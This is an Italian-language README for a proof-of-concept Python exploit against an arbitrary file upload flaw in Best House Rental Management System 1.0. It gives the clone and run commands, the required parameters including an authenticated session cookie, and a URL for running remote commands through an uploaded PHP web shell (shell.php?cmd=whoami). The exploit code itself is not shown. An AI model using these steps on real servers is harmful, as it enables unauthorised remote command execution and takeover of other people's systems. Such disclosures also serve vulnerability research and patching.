
Script PoC in Python che sfrutta una vulnerabilità di caricamento file arbitrario in Best House Rental Management System 1.0 per caricare una web shell PHP ed eseguire comandi remoti.
Questo script Python dimostra come sfruttare la vulnerabilità di upload arbitrario di file in Best House Rental Management System 1.0. La vulnerabilità consente a un malintenzionato di caricare un file dannoso (come una web shell PHP) ed eseguire comandi arbitrari sul server di destinazione.
Clonare il repository e navigare nella directory:
git clone https://github.com/yourusername/house-rental-poc.git
cd house-rental-poc
Eseguire l'exploit con i seguenti parametri:
python exploit_house_rental.py <target_url> <file_upload_path> <session_cookie>
target_url: L'URL della pagina vulnerabile di upload file (es. )http://<target-site>/rental/admin_class.php?view=save_settingsfile_upload_path: Il percorso in cui vengono memorizzati i file caricati (es. http://<target-site>/path/to/uploaded/files)session_cookie: Il cookie di sessione dell'utente autenticatoSe ha successo, sarà possibile eseguire comandi sul server di destinazione visitando:
http://<file_upload_path>/shell.php?cmd=whoami
Testare eseguendo comandi come whoami o uname -a.
python exploit_house_rental.py http://127.0.0.1/rental/admin_class.php?view=save_settings http://127.0.0.1/uploads/ SESSION_ID=123456789
Questo codice è rilasciato sotto licenza MIT.